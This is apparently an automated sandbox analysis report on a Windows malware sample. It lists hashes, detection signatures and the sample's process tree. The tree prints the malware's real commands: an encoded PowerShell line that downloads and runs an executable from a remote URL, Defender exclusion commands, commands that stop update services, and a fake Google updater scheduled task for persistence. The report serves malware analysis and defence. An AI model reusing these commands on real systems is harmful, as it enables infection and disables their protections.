Edit tour
Windows
Analysis Report
SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe
Overview
General Information
| Sample name: | SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe |
| Analysis ID: | 1451678 |
| MD5: | 3b5865192ea41263be0a78b4d8a7c795 |
| SHA1: | 946d09aeb6ad5c0fd13d4bbd24ed08623f84e413 |
| SHA256: | 1f5b18d6733e467c7d89b90cd82f4ec287423ab049617b3e1d0dda246731ce81 |
| Tags: | exe |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe (PID: 7280 cmdline: "C:\Users\ user\Deskt op\Securit eInfo.com. Win32.Evo- gen.6103.1 0668.exe" MD5: 3B5865192EA41263BE0A78B4D8A7C795) 
powershell.exe (PID: 7324 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EncodedCo mmand "PAA jAGwAaQBmA CMAPgAgAEE AZABkAC0AT QBwAFAAcgB lAGYAZQByA GUAbgBjAGU AIAA8ACMAc ABsAHMAIwA +ACAALQBFA HgAYwBsAHU AcwBpAG8Ab gBQAGEAdAB oACAAQAAoA CQAZQBuAHY AOgBVAHMAZ QByAFAAcgB vAGYAaQBsA GUALAAkAGU AbgB2ADoAU wB5AHMAdAB lAG0ARAByA GkAdgBlACk AIAA8ACMAa wBpAGQAIwA +ACAALQBGA G8AcgBjAGU AIAA8ACMAc wBwAHIAIwA +ADsAKABOA GUAdwAtAE8 AYgBqAGUAY wB0ACAAUwB 5AHMAdABlA G0ALgBOAGU AdAAuAFcAZ QBiAEMAbAB pAGUAbgB0A CkALgBEAG8 AdwBuAGwAb wBhAGQARgB pAGwAZQAoA CcAaAB0AHQ AcABzADoAL wAvAGcAaQB 0AGgAdQBiA C4AYwBvAG0 ALwB0AGEAc gB6AGEAbgB yAGUALwBtA HkAcgBlAHA AbwAvAHIAZ QBsAGUAYQB zAGUAcwAvA GQAbwB3AG4 AbABvAGEAZ AAvAGEALwB zAHQAZQBhA G0ALgBlAHg AZQAnACwAI AA8ACMAdQB nAGwAIwA+A CAAKABKAG8 AaQBuAC0AU ABhAHQAaAA gADwAIwBkA HEAYQAjAD4 AIAAtAFAAY QB0AGgAIAA kAGUAbgB2A DoAVABlAG0 AcAAgADwAI wBjAHoAcQA jAD4AIAAtA EMAaABpAGw AZABQAGEAd ABoACAAJwB zAHYAYwAuA GUAeABlACc AKQApADwAI wB2AHQAZwA jAD4AOwAgA FMAdABhAHI AdAAtAFAAc gBvAGMAZQB zAHMAIAAtA EYAaQBsAGU AUABhAHQAa AAgADwAIwB 1AHcAZgAjA D4AIAAoAEo AbwBpAG4AL QBQAGEAdAB oACAALQBQA GEAdABoACA AJABlAG4Ad gA6AFQAZQB tAHAAIAA8A CMAbABzAGY AIwA+ACAAL QBDAGgAaQB sAGQAUABhA HQAaAAgACc AcwB2AGMAL gBlAHgAZQA nACkAPAAjA GcAZwBtACM APgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 7332 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - svc.exe (PID: 7576 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\svc.ex e" MD5: 327B8ED0CDEBAE6962718656B5A72A4C) 
dialer.exe (PID: 7912 cmdline: C:\Windows \System32\ dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93) 
winlogon.exe (PID: 552 cmdline: winlogon.e xe MD5: F8B41A1B3E569E7E6F990567F21DCE97) - lsass.exe (PID: 628 cmdline:
C:\Windows \system32\ lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A) - svchost.exe (PID: 920 cmdline:
C:\Windows \system32\ svchost.ex e -k DcomL aunch -p - s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - dwm.exe (PID: 988 cmdline:
"dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C) - svchost.exe (PID: 364 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s g psvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 356 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 696 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 592 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s TimeBroke rSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1044 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S chedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1084 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s P rofSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1200 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1252 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s U serManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1296 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s EventS ystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1316 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s T hemes MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1408 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1488 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1496 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S ENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1552 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s AudioEndpo intBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1572 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s FontCa che MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1652 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s DispBr okerDeskto pSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1724 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p -s NlaS vc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1824 cmdline:
C:\Windows \System32\ svchost.ex e -k Local Service -p -s netpro fm MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1840 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1940 cmdline:
C:\Windows \system32\ svchost.ex e -k Netwo rkService -p -s Dnsc ache MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1948 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 7592 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amFiles) - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7752 cmdline:
C:\Windows \System32\ cmd.exe /c sc stop U soSvc & sc stop WaaS MedicSvc & sc stop w uauserv & sc stop bi ts & sc st op dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7760 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7800 cmdline:
sc stop Us oSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 7812 cmdline:
sc stop Wa aSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 7828 cmdline:
sc stop wu auserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 7844 cmdline:
sc stop bi ts MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - sc.exe (PID: 7860 cmdline:
sc stop do svc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- cmd.exe (PID: 7876 cmdline:
C:\Windows \System32\ cmd.exe /c powercfg /x -hibern ate-timeou t-ac 0 & p owercfg /x -hibernat e-timeout- dc 0 & pow ercfg /x - standby-ti meout-ac 0 & powercf g /x -stan dby-timeou t-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7884 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7948 cmdline:
powercfg / x -hiberna te-timeout -ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 7996 cmdline:
powercfg / x -hiberna te-timeout -dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 8060 cmdline:
powercfg / x -standby -timeout-a c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - powercfg.exe (PID: 8084 cmdline:
powercfg / x -standby -timeout-d c 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- powershell.exe (PID: 7936 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# tcvsvxpo#> IF([Syste m.Environm ent]::OSVe rsion.Vers ion -lt [S ystem.Vers ion]"6.2") { schtask s /create /f /sc onl ogon /rl h ighest /ru 'System' /tn 'Googl eUpdateTas kMachineQC ' /tr '''C :\Program Files\Goog le\Chrome\ updater.ex e''' } Els e { Regist er-Schedul edTask -Ac tion (New- ScheduledT askAction -Execute ' C:\Program Files\Goo gle\Chrome \updater.e xe') -Trig ger (New-S cheduledTa skTrigger -AtStartup ) -Setting s (New-Sch eduledTask SettingsSe t -AllowSt artIfOnBat teries -Di sallowHard Terminate -DontStopI fGoingOnBa tteries -D ontStopOnI dleEnd -Ex ecutionTim eLimit (Ne w-TimeSpan -Days 100 0)) -TaskN ame 'Googl eUpdateTas kMachineQC ' -User 'S ystem' -Ru nLevel 'Hi ghest' -Fo rce; } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Operating System Destruction |   |
|---|
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Jonathan Cheong, oscd.community: | ||